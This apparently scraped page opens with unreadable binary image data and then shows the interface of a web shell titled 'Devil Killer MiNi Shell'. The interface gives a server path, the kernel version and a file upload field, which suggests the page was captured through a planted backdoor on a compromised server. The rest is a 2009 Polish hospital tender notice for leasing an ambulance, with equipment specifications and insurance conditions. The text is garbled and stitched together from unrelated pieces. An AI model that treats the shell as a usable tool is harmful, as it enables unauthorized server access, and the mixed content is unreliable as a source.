JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090730/123691-N-2009.html

<p class="kh_header"><b>Włocławek: DIZ / 36 / 2009</b><br>
<b>Numer ogłoszenia: 123691 - 2009; data zamieszczenia: 30.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ / 36 / 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiot zamówienia 
        Przedmiotem zamówienia jest dostawa w formie leasingu fabrycznie nowego Ambulansu Ratunkowego oraz przeniesienie  jego własności na Zamawiającego po okresie trwania umowy.
       Przedmiot zamówienia obejmuje leasing jednego samochodu rocznik 2009 typu furgon -Ambulans Ratunkowy o danych technicznych i wyposażeniu określonym w Specyfikacji technicznej stanowiącej Załącznik nr 8 do SIWZ.
Zamawiający wymaga, aby przedmiot zamówienia był
1.	najwyższej jakości i spełniał parametry wymienione w Specyfikacji technicznej ,
2.	objęty był gwarancją
- minimum 2 lata podstawa bez limitu kilometrów,
-minimum  3 lata na powłokę lakierniczą,
      - minimum 12 lat na perforację korozyjną licząc od  daty odbioru samochodu

2. Wyposażenie Ambulansu w sprzęt medyczny
1.	Defibrylator -Lifepack 12 + ładowarka do baterii, kable, pulsoksymetr, mankiet do RR
2.	Termos - do podgrzewania płynów
3.	ssak przenośny
4.	pompa infuzyjna,
5.	nosze wraz z platformą
6.	krzesło kardiologiczne
7.	podbierak,
8.	deska ortopedyczna

ZESTAW TRANSPORTOWY REANIMACYJNY (NOSZE Z TRANSPORTEREM I MOCOWANIEM DO LAWETY AMBULANSU)
  NOSZE GŁÓWNE REANIMACYJNE 
 (Model   urządzenia  producent  rok produkcji)		
 - potrójnie łamane z możliwością ustawienia pozycji  
   przeciwwstrząsowej i pozycji  zmniejszającej   napięcie    mięśni brzucha,
 - płynna regulacja nachylenia oparcia pod plecami do kąta    min. 75°,
 - wysuwane rączki do przenoszenia 
- zabezpieczone  antykorozyjne poprzez wykonanie z
   odpowiedniego   materiału lub  dodatkowe   pokrycie specjalną farbą o   tzw.  porach zamkniętych
 - pasy zabezpieczające o regulowanej długości mocowane    bezpośrednio do ramy noszy (w   tym   pasy szelkowe),
 - możliwość wprowadzania noszy przodem i tyłem do 
    kierunku jazdy,
 - cienki materac z tworzywa sztucznego o powierzchni  antypoślizgowej nieabsorbujący krwi   i płynów,
 - dodatkowe pasy zabezpieczające transport dzieci na 
    noszach,
 - składany wieszak na pojemnik z płynami infuzyjnymi,
 - składane oparcia boczne,
 - konstrukcja pozwalająca na uzyskanie do intubacji 
   pozycji głowy tzw. pozycji węszącej	TAK


	
2.  TRANSPORTER DO NOSZY GŁÓWNYCH  
(Model urządzenia  producent  rok produkcji)		
- z systemem szybkiego i bezpiecznego połączenia 
  z noszami,
- z możliwością zapięcia noszy głową lub nogami w 
  kierunku jazdy,
- dodatkowe uchylne uchwyty transportera 
- z wielostopniową regulacją wysokości minimum w 6 
    poziomach,
 - wyposażony w kółka jezdne obrotowe w zakresie o 360   stopni, min. 2 kółka  wyposażone w hamulce 
- możliwością zablokowania dwóch do jazdy na wprost,
-  możliwość odblokowania kółek do jazdy na wprost 
    realizowana przez fabrycznie  zamontowany    system     pozwalający na prowadzenie transportera bokiem przez    jedną  osobę   z dowolnego  miejsca na obwodzie   transportera  
 - system niezależnego składania się goleni przednich i 
    tylnych przy wprowadzaniu i wyprowadzaniu noszy
    z do  ambulansu pozwalający na bezpieczne 
    wprowadzenie   wyprowadzenie noszy z pacjentem 
     nawet przez jedną    osobę. 
 - obciążenie dopuszczalne co najmniej 200 kg,
 - możliwość ustawienia pozycji drenażowych 
   Trendelenburga i Fowlera na minimum trzech 
   poziomach pochylenia,
- zabezpieczony antykorozyjne poprzez wykonanie z 
   odpowiedniego materiału lub  dodatkowe   pokrycie 
   specjalną farbą o tzw. porach zamkniętych
 - z systemem mocowania transportera do lawety  ambulansu 
- skrócona instrukcja obsługi zestawu transportowego 
   umieszczona w widocznym miejscu,
- folder, instrukcja obsługi, deklaracja zgodności CE, 
- certyfikat potwierdzający zgodność zestawu z normą
    PN-EN 1789
- certyfikat potwierdzający zgodność zestawu z normą
    PN-EN 1865 	TAK


	
NOSZE ZBIERAKOWE
(Model urządzenia  producent  rok produkcji)		
- wykonane z aluminium
- wielostopniowa regulacja długości oraz możliwość złożenia do transportu  
- rozdzielane na dwie niezależne połówki;  
- min. 3 pasy zabezpieczające mocowane do noszy
- dopuszczalne obciążenie min 150 kg
- waga max. 8 kg.
- deklaracja zgodności CE - załączyć do oferty
- folder - załączyć do oferty
	TAK
	
DESKA ORTOPEDYCZNA 
(Model urządzenia  producent  rok produkcji)		
DESKA:
- wykonana z  tworzywa sztuczne , łatwozmywalnego w kolorze zielonym
- Minimum 14 dużych uchwytów umożliwiających pracę w grubych rękawicach 
- Trzpienie do mocowania pasów karabińczykowych - min. 5 szt. na jednej stronie wbudowane w sposób uniemożliwiający kontuzje dłoni personelu przenoszącego tj. w osobnych otworach , niezależnych od uchwytów do przenoszenia za pomocą rąk.

Długość - min. 180 cm
Szerokość - min. 45 cm
Waga deski - max 8 kg

PASY ZABEZPIECZAJACE DO DESKI
- konstrukcja pasa dwuczęściowa
- możliwość regulacji długości
- zapięcie pasów w postaci metalowego szybkozłącza
- mocowanie pasa do trzpieni za pomocą metalowych obrotowych karabińczyków
- pasy kodowane kolorem

STABILIZATOR GŁOWY
- system 2 klocków z otworami  umożliwiającymi dostęp do tętnic szyjnych
- podkładka z rzepem do przyczepiania klocków
- paski do mocowania stabilizatora do deski 

- deklaracje zgodności  CE - załączyć do oferty
- Folder - załączyć do oferty
	TAK
	
KRZESEŁKO KARDIOLOGICZNE 
(Model urządzenia  producent  rok produkcji)		

 - możliwość złożenia do transportu w ambulansie
- wysuwane rączki przednie
- udźwig co najmniej 150 kg
- minimum 2 pasy poprzeczne 
- waga krzesełka do 10 kg
- deklaracja zgodności CE - załączyć do oferty 
-  Folder - załączyć do oferty
	TAK
 
	
POMPA INFUZYJNA JEDNOSTRZYKAWKOWA (Model urządzenia  producent  rok produkcji)		
- transportowa z zasilaniem akumulatorowo- sieciowym
- przystosowana do polskich strzykawek 10 ml - 50 ml
- szybkość podawania do 0,1ml h do 99ml h
- automatyczne rozpoznawanie strzykawki
- wbudowana biblioteka leków
- funkcja bezpiecznego podawania dawki uderzeniowej
- wskaźnik ciśnienia infuzji
- szybkość dozowania dawki uderzeniowej 
   programowalna co 1 ml h
- zasilanie 220V i 12V z wtyczką do gniazda w 
  ambulansie
- płynne przechodzenie z zasilania sieciowego na zasilanie   z akumulatora
- funkcja alarmu dźwiękowego
- deklaracja zgodności CE - załączyć do oferty 
-  Folder - załączyć do oferty
	TAK
	
DEFIBRYLATOR  
(Model urządzenia  producent  rok produkcji)		
- zasilanie akumulatorowe i sieciowe z instalacji 230 V i 
  12 V
- Tryb pracy półautomatyczny i manualny
- Typ dwufazowy z kardiowersją, energia w zakresie 2J 
   do  nie mniej niż 200 J ustawiana na 25  poziomach
- Instrukcje głosowe w języku polskim
- Prezentacja na ekranie w języku polskim
- Detekcja rytmu stymulatora
- Rejestrowane dane  przebieg całości akcji i ratowania
   życia
- możliwość wykonania 12-odprowadzeniowego EKG
- komplet odprowadzeń EKG, komplet kabli
- łyżki nakładki dla dzieci i dorosłych
- certyfikat potwierdzający zgodność zestawu z normą 
  PN-EN 1789
 - deklaracja zgodności CE - załączyć do oferty 
-  Folder - załączyć do oferty
	TAK

	
PULSOKSYMETR TRANSPORTOWY
(Model urządzenia  producent / rok produkcji)		
1. Zakres pomiarowy w zakresie min.:
SpO2  0 - 100%
Częstotliwość pulsu: 20 - 300 1/min
2. Dokładność:
 SpO2: maks. + - 2% (70 - 100%)
 Częstotliwość pulsu  maks. + - 1 Digit do 100/min oraz + - 1% powyżej  100 min
3. Kolorowy wyświetlacz OLED min. 128 x 160 punktów
4. Wyświetlane parametry:
Wysycenie tlenem
Częstotliwość
Puls
Pletyzmogram
Bargraf
Trend krótkotrwały i długotrwały
5. Wskaźniki: jakość sygnału, amplituda pulsu, naładowanie baterii, wygłuszenie alarmu, rozpoznanie czujnika, brak połączenia z czujnikiem
6. Informacje trendu:
Trend długotrwały min. do 48 
 - deklaracja zgodności CE - załączyć do oferty 
-  Folder - załączyć do oferty
	TAK
	
SSAK AKUMULATOROWY TRANSPORTOWY 
( Model urządzenia  producent  rok produkcji)		
- Ssak akumulatorowo - sieciowy z możliwością zasilania
  12V i  220V
- precyzyjna stopniowa podświetlana regulacja siły ssania 
  umożliwiająca dokładne ustawienie siły  ssania - nawet w warunkach ograniczonej widoczności  
  regulowana w zakresie dolna granica regulacji nie 
  większa 0,05 kPa, górna nie  mniej niż -70kPa 
- przepływ min. 20 l min 
- wbudowany akumulator - czas pracy min. 40 min.
- podświetlany wskaźnik bieżącego poziomu naładowania 
  baterii
- słój na wydzielinę o poj. min.0,8 L z tworzywa 
  sztucznego , przystosowany do sterylizacji 
- płyta ścienna uchwyt do mocowania ssaka z funkcją 
  zasilania 12 V
- certyfikat zgodności zestawu z normą PN-EN 1789 - załączyć do oferty
 - deklaracja zgodności CE - załączyć do oferty 
-  Folder - załączyć do oferty
	TAK

	
PRZENOŚNY OGRZEWACZ PŁYNÓW INFUZYJNYCH
( Model urządzenia  producent  rok produkcji)		
-	Materiał zewnętrzny typu cordura lub równoważnego
-	Izolujący materiał wewnętrzny
-	Ogrzewanie płynów do temperatury od 36 do 38 °C bez względu na warunki zewnętrzne
-	Wbudowany termostat
-	Możliwość zawieszenia na stojaku
-	Pojemność min. 3 l
-	Zasilanie 12V i 220V
-	Możliwość podawania - bezpośrednio z ogrzewacza -  płynów infuzyjnych jednocześnie min. z 2 kroplówek
- folder załączyć   	TAK
	

 3. Wymagania dotyczące leasingu:
           Dotyczy  samochodu  z opcją wykupu:
Leasing w walucie: 	złoty
Rodzaj rat leasingowych	równe
Okres leasingu	48 miesięcy
Wartość pierwszej raty	10% wartości samochodu
Wartość wykupu przedmiotu leasingu po zakończonej umowie leasingu	1% wartości początkowej samochodu
Zakres ubezpieczenia	AC, OC, NNW, Assistance  pojazdu


4. Warunki ubezpieczenia 

    I. Wymagane warunki AC 
1.	Suma ubezpieczenia powinna odpowiadać wartości pojazdu w dniu zawarcia umowy ubezpieczenia.
2.	Ubezpieczeniem powinny być objęte szkody powstałe w pojeździe bądź jego wyposażeniu polegające na:
a)	uszkodzeniu pojazdu w związku z ruchem i postojem wskutek:
-	nagłego działania siły mechanicznej w chwili zetknięcia pojazdu z pochodzącymi z zewnątrz pojazdu: innym pojazdem, osobami, zwierzętami lub przedmiotami,
-	działania osób trzecich, w tym również włamania.
b)	uszkodzeniu lub utracie pojazdu wskutek następujących zdarzeń losowych:
-	powodzi, zatopienia, uderzenia pioruna, pożaru, wybuchu, opadu atmosferycznego, huraganu, osuwania lub zapadania się ziemi,
-	nagłego działania czynnika termicznego lub chemicznego pochodzącego z zewnątrz pojazdu.
c)	uszkodzeniu wnętrza pojazdu przez osoby, których przewóz wymagany był potrzebą udzielenia pomocy medycznej,
d)	kradzieży pojazdu, jego części lub wyposażenia,
e)	uszkodzeniu pojazdu w następstwie jego zabrania w celu krótkotrwałego użycia, kradzieży pojazdu, jego części lub wyposażenia.
3. Przedmiot ubezpieczenia: pojazd wraz z wyposażeniem podstawowym oraz wyposażeniem dodatkowym bez zastosowania udziału własnego w szkodach AC - w ruchu i postoju oraz AC - kradzież, wysokość odszkodowania zostanie ustalona od pełnej wartości samochodu wraz z podatkiem VAT.
4.	W szkodach polegających na uszkodzeniu ubezpieczonych pojazdu przy ustaleniu wartości szkody nie będzie potrącane zużycie eksploatacyjne części zamiennych zakwalifikowanych do wymiany - zniesienie amortyzacji.
5.	Na wysokość wypłaconego odszkodowania nie będzie miało wpływu naruszenie przez Ubezpieczonego przepisów Prawa o ruchu drogowym.
6.	Likwidacja szkód nastąpi poprzez bezgotówkową naprawę w autoryzowanym serwisie naprawczym.
7.	W przypadku braku naprawy nastąpi rozliczenie kosztorysowe (zakres terytorialny RP oraz UE).
8.	Stała suma odszkodowania - suma ubezpieczenia pojazdu nie podlega pomniejszeniu o wypłacone odszkodowania oraz utratę wartości pojazdu (brak konieczności doubezpieczania pojazdu po szkodzie).

II. Wymagane warunki OC:

W zakresie określonym ustawą z dnia 22 maja 2003 r. o ubezpieczeniach obowiązkowych, Ubezpieczeniowym Funduszu Gwarancyjnym i Polskim Biurze Ubezpieczycieli Komunikacyjnych (Dz. U. Nr 124, poz. 1152 ze zmianami).

III. Wymagane warunki NNW: 
1.	Ubezpieczeniem powinni być objęci: kierowca i każdy z pasażerów. 
2.	Suma ubezpieczeń wynosi 10 000 zł na jedno miejsce (system miejsc).
3.	Przedmiotem ubezpieczenia będą co najmniej trwałe następstwa nieszczęśliwych wypadków powstałych:
a.	podczas wsiadania do pojazdu i wysiadania z pojazdu,
b.	podczas przebywania w pojeździe w przypadku zatrzymania pojazdu lub postoju na trasie jazdy, 
c.	podczas naprawy pojazdu na trasie jazdy, 
d.	bezpośrednio przy załadowywaniu i rozładowywaniu pojazdu.
4 W ramach sumy ubezpieczenia Ubezpieczyciel powinien gwarantować następujące świadczenia:
a)	świadczenia z tytułu trwałego uszczerbku na zdrowiu będącego następstwem nieszczęśliwego wypadku w stosunku procentowym do sumy ubezpieczenia w jakim ubezpieczony doznał trwałego uszczerbku, w wysokości 1% sumy ubezpieczenia za każdy procent trwałego uszczerbku na zdrowiu,
b)	świadczenia z tytułu śmierci zaistniałej w wyniku NNW w wysokości 100% sumy ubezpieczenia, 
c)	zwrot kosztów nabycia (w złotych) środków pomocniczych i protez proporcjonalnie do stopnia trwałego uszczerbku lecz nie więcej niż do wysokości 10% sumy ubezpieczenia, 
d)	zwrot kosztów leczenia (w złotych) NNW proporcjonalnie do stopnia trwałego uszczerbku lecz nie więcej niż do wysokości 10% sumy ubezpieczenia, 
e)	zwrot udokumentowanych kosztów transportu zwłok od miejsca zgonu do miejsca pochowania.

IV. Wymagane warunki Assistance:
1. Ubezpieczenie Assistance, powinno gwarantować kierowcom i pasażerom pojazdów:
a)	pomoc w trudnych sytuacjach, takich jak wypadek, awaria, unieruchomienie oraz kradzież pojazdu, a także w przypadkach nagłego zachorowania kierowcy oraz urazu ciała kierowcy lub pasażera,
b)	pomoc techniczną, medyczną, organizacyjną  i informacyjną, udzielaną na terenie całej Polski,
c)	bezpłatne holowanie z miejsca wypadku dla poszkodowanego oraz dla sprawcy wypadku lub kolizji, 
d)	pełen zakres bezpłatnych usług pomocy drogowej,
e)	pojazd zastępczy.
2. Świadczeniami realizowanymi pod warunkiem zaistnienia zdarzenia objętego ochroną ubezpieczeniową w odległości powyżej 50 km od siedziby Zamawiającego powinny być
a)	w przypadku awarii pojazdu
-	pomoc techniczna dotycząca pojazdu (naprawa na miejscu zdarzenia albo holowanie do najbliższego autoryzowanego warsztatu naprawczego),
-	pomoc kierowcy i pasażerom, (zakwaterowanie lub przejazd do miejsca zamieszkania lub pobytu, odbiór naprawionego pojazdu).
b)	w przypadku unieruchomienia pojazdu z powodu wypadku lub awarii, Ubezpieczyciel powinien organizować i pokrywać koszty naprawy na miejscu zdarzenia albo organizować i pokrywać koszty holowania do najbliższego autoryzowanego warsztatu naprawczego (ewentualnie najpierw na wybrany przez Ubezpieczyciela parking, jeżeli zdarzenie zaszło poza godzinami pracy warsztatu naprawczego) albo do miejsca zamieszkania lub pobytu (lub warsztatu naprawczego w pobliżu miejsca zamieszkania lub pobytu) posiadacza pojazdu wg następujących limitów
-	limit kwotowy naprawy na miejscu zdarzenia powinien wynosić co najmniej 400 PLN,
-	limit kwotowy holowania pojazdu do najbliższego autoryzowanego warsztatu powinien wynosić co najmniej 400 PLN albo do miejsca zamieszkania lub pobytu (lub warsztatu w pobliżu miejsca zamieszkania lub pobytu) 600 PLN.
c)	w przypadku unieruchomienia pojazdu z powodu braku paliwa, Ubezpieczyciel   organizuje i pokrywa koszty dostarczenia właściwego paliwa (z wyłączeniem kosztów paliwa) do miejsca zatrzymania tego pojazdu w ilości niezbędnej do dojechania do najbliższej czynnej stacji paliw,
d)	jeżeli w następstwie wypadku lub awarii pojazd jest unieruchomiony i gdy jego naprawa nie może odbyć się w tym samym dniu, w którym nastąpiło zdarzenie (np. dzień świąteczny, weekend) albo gdy pojazd został skradziony i nie odzyskano go w dniu kradzieży, Ubezpieczyciel
-	organizuje i pokrywa koszty przejazdu do najbliższego hotelu oraz zakwaterowania (noclegów) kierowcy i pasażerów pojazdu w hotelu - do momentu naprawienia lub odzyskania tego pojazdu i nie dłużej niż przez 3 doby; limit kwotowy zakwaterowania jednej osoby powinien wynosić co najmniej 120 PLN za dobę, 
bądź
-	organizuje i opłaca koszty przejazdu kierowcy i pasażerów pojazdu środkiem transportu wybranym przez Ubezpieczyciela do ich miejsc zamieszkania lub pobytu, albo do miejsca przeznaczenia, gdy koszt kontynuacji podróży nie jest wyższy od kosztu przejazdu do miejsca zamieszkania lub pobytu,
-	organizuje i pokrywa koszty jednorazowego przejazdu właściciela po odbiór naprawionego albo odzyskanego po kradzieży pojazdu środkiem transportu wybranym przez Ubezpieczyciela.
e) jeżeli wskutek urazu ciała konieczny jest transport medyczny kierowcy lub pasażerów w celu hospitalizacji, Ubezpieczyciel powinien organizować i pokrywać co najmniej koszty następujących usług
-	transportu sanitarnego poszkodowanych do jednego z najbliższych szpitali lub
-	przewiezienia poszkodowanych do szpitala wyposażonego w urządzenia specjalistyczne (medyczne) odpowiednim środkiem transportu z niezbędną opieką, jeżeli z medycznego punktu widzenia taki transport jest konieczny albo,
-	bezpośredniego transportu poszkodowanych lotem rejsowym do odpowiedniego szpitala albo innego ośrodka leczniczego w pobliżu miejsca zamieszkania poszkodowanego w RP, albo bezpośrednio do jego miejsca zamieszkania lub pobytu, z niezbędną opieką medyczną, włącznie z przewożeniem ambulansem drogowym na i z lotniska, jeżeli jego stan zdrowia zezwala na taki transport. O możliwości oraz sposobie transportu decyduje lekarz prowadzący ubezpieczonego w szpitalu lub lekarz upoważniony przez Ubezpieczyciela,
f)	w przypadku, gdy kierowca doznał urazu ciała lub nagle zachorował, a żaden z pasażerów nie posiada prawa jazdy lub nie może kierować pojazdem, Ubezpieczyciel zapewnia zmiennika kierowcy w celu powrotu pasażerów ubezpieczonym pojazdem do miejsca zamieszkania lub pobytu posiadacza pojazdu. Koszty paliwa ponosi posiadacz lub pasażerowie pojazdu;
g)	w przypadku zgonu, Ubezpieczyciel organizuje i pokrywa koszty transportu zwłok do miejsca pochowania w Polsce,
h)	w razie awarii, wypadku, kradzieży lub unieruchomienia pojazdu:
-	udzielenie informacji o telefonach pomocy drogowej na terenie RP, na żądanie i koszt kierowcy, zorganizowanie przyjazdu pomocy drogowej w celu naprawy pojazdu na miejscu zdarzenia lub odholowania go do warsztatu,
-	udzielenie informacji o lokalnej sieci autoryzowanych warsztatów samochodowych i lokalnych możliwościach naprawy pojazdu,
-	przekazanie pilnej wiadomości - w związku z zaistnieniem zdarzenia objętego ochroną ubezpieczeniową - osobie wskazanej przez kierowcę lub pasażera pojazdu,
-	udzielenie informacji w zakresie otrzymania pojazdu zastępczego.

1)	66114000-2 Usługi leasingu finansowego, 
2)	34.11.00.00 - Samochody osobowe
3)	66514110-0 Usługi ubezpieczeń pojazdów mechanicznych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.40.00-2, 66.51.41.10-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymaga się<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	posiadają uprawnienia  do wykonywania określonej działalności  lub czynność , jeśli ustawy nakładają obowiązek posiadania takich uprawnień
        - wykonawca musi wykazać się prowadzeniem działalności gospodarczej  w zakresie  Opisanym w Rozdziale III,
      Wykonawca który nie prowadzi działalności w  ww.   branży zostanie wykluczony.
      2 . posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i   osobami zdolnymi do wykonania zamówienia tj.     - doświadczenia ww. zakresie    lub przedstawią pisemne, zobowiązanie innych podmiotów do udostępnienia potencjału  technicznego i osób zdolnych do wykonania zamówienia

       3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

       4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy    pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a.wypełniony i podpisany Druk ofertowy, zgodnie z  Załącznikiem nr 1  do niniejszej  
    specyfikacji
b. oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem  nr 2 do  niniejszej specyfikacji
c. oświadczenie o zapoznaniu się z niektórymi przepisami, zgodnie z Załącznikiem nr 3 do niniejszej specyfikacji
d. oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia,   zgodnie z  Załącznikiem nr 4 
e. zaakceptowany i podpisany projekt umowy stanowiący Załącznik nr 5 do niniejszej  specyfikacji/
f. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów 
    rejestracyjnych) w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów  rejestracyjnych   
g. upoważnienie do podpisania oferty (fakultatywnie.

2. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 1 Zamawiający żąda następujących dokumentów

a. koncesja  zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek ich posiadania na podjęcie działalności gospodarczej w zakresie objętym zamówieniem 
b. aktualny odpis z właściwego rejestru, albo zaświadczenie o wpisie do ewidencji  działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert
